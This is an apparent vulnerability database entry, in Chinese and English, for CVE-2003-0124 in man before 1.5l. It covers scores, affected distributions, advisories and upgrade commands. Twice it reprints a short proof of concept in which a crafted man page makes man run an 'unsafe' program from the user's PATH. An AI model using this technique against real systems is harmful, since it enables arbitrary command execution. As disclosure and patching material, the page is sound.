CVE-2003-0124
CVSS4.6
发布时间 :2003-03-18 00:00:00
修订时间 :2016-10-17 22:29:49
NMCOES    

[原文]man before 1.5l allows attackers to execute arbitrary code via a malformed man file with improper quotes, which causes the my_xsprintf function to return a string with the value "unsafe," which is then executed as a program via a system call if it is in the search path of the user who runs man.


[CNNVD]Man程序不安全返回值命令执行漏洞(CNNVD-200303-055)

        Man 1.5l之前的版本存在漏洞。远程攻击者可以借助一个带有不正确引用的畸形man文件执行任意代码,该漏洞可以导致my_xsprintf函数返回一个带有“unsafe”值的字符串,然后借助系统调用像程序一样执行,该系统调用在运行man的用户搜索路径上。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:andries_brouwer:man:1.5i
cpe:/a:andries_brouwer:man:1.5k
cpe:/a:andries_brouwer:man:1.5h1
cpe:/a:andries_brouwer:man:1.5i2
cpe:/a:andries_brouwer:man:1.5j

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0124
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0124
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-055
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000620
(UNKNOWN)  CONECTIVA  CLSA-2003:620
http://marc.info/?l=bugtraq&m=104740927915154&w=2
(UNKNOWN)  BUGTRAQ  20030311 Vulnerability in man < 1.5l
http://marc.info/?l=bugtraq&m=104802285112752&w=2
(UNKNOWN)  GENTOO  GLSA-200303-13
http://www.redhat.com/support/errata/RHSA-2003-133.html
(UNKNOWN)  REDHAT  RHSA-2003:133
http://www.redhat.com/support/errata/RHSA-2003-134.html
(UNKNOWN)  REDHAT  RHSA-2003:134
http://www.securityfocus.com/bid/7066
(VENDOR_ADVISORY)  BID  7066
http://xforce.iss.net/xforce/xfdb/11512
(UNKNOWN)  XF  man-myxsprintf-code-execution(11512)

- 漏洞信息

Man程序不安全返回值命令执行漏洞
中危 设计错误
2003-03-18 00:00:00 2006-11-02 00:00:00
本地  
        Man 1.5l之前的版本存在漏洞。远程攻击者可以借助一个带有不正确引用的畸形man文件执行任意代码,该漏洞可以导致my_xsprintf函数返回一个带有“unsafe”值的字符串,然后借助系统调用像程序一样执行,该系统调用在运行man的用户搜索路径上。

- 公告与补丁

        Sorcerer Linux has released an advisory. Users are advised to update man sources by issuing the following commands:
        augur synch && augur update
        It is recommended that all Gentoo Linux users who are running
        sys-apps/man upgrade to man-1.5l as follows:
        emerge sync
        emerge man
        emerge clean
        Mandrake has released a security advisory (MDKSA-2003:054) containing fixes to address this issue. Users are advised to apply fixes as soon as possible.
        Sun has released an update for Sun Linux 5.0.5.
        Fixes available:
        Andries Brouwer man 1.5 k
        
        Andries Brouwer man 1.5 i
        
        Andries Brouwer man 1.5 i2
        
        Andries Brouwer man 1.5 j
        
        Andries Brouwer man 1.5 h1
        

- 漏洞信息 (22344)

Man Program 1.5 Unsafe Return Value Command Execution Vulnerability (EDBID:22344)
linux local
2003-03-11 Verified
0 Jack Lloyd
N/A [点击下载]
source: http://www.securityfocus.com/bid/7066/info

It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands.

$ cat innocent.1
.so "".1
$ cat '"".1' # the outer '' quotes are for the shell
the user will never see this
$ cat `which unsafe`
#!/bin/sh

echo "oops"
id -a
$ man ./innocent.1
oops
uid=528(lloyd) gid=100(users) groups=100(users)
$		

- 漏洞信息

8806
man Malformed man Page Command Execution

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-03-11 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Man Program Unsafe Return Value Command Execution Vulnerability
Design Error 7066
No Yes
2003-03-11 12:00:00 2009-07-11 09:06:00
Discovery credited to Jack Lloyd <lloyd@acm.jhu.edu>.

- 受影响的程序版本

Andries Brouwer man 1.5 k
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ RedHat Linux 8.0 i686
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
Andries Brouwer man 1.5 j
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
+ Sun Linux 5.0.5
Andries Brouwer man 1.5 i2
Andries Brouwer man 1.5 i
Andries Brouwer man 1.5 h1
+ Red Hat Linux 6.2
+ RedHat Linux 7.0
+ RedHat Linux 5.2
Andries Brouwer man 1.5 l

- 不受影响的程序版本

Andries Brouwer man 1.5 l

- 漏洞讨论

It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands.

- 漏洞利用

The following proof of concept has been made available by Jack Lloyd &lt;lloyd@acm.jhu.edu&gt;:

$ cat innocent.1
.so "".1
$ cat '"".1' # the outer '' quotes are for the shell
the user will never see this
$ cat `which unsafe`
#!/bin/sh

echo "oops"
id -a
$ man ./innocent.1
oops
uid=528(lloyd) gid=100(users) groups=100(users)
$

- 解决方案

Sorcerer Linux has released an advisory. Users are advised to update man sources by issuing the following commands:

augur synch && augur update

It is recommended that all Gentoo Linux users who are running
sys-apps/man upgrade to man-1.5l as follows:

emerge sync
emerge man
emerge clean

Mandrake has released a security advisory (MDKSA-2003:054) containing fixes to address this issue. Users are advised to apply fixes as soon as possible.

Sun has released an update for Sun Linux 5.0.5.

Fixes available:


Andries Brouwer man 1.5 k

Andries Brouwer man 1.5 i

Andries Brouwer man 1.5 i2

Andries Brouwer man 1.5 j

Andries Brouwer man 1.5 h1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站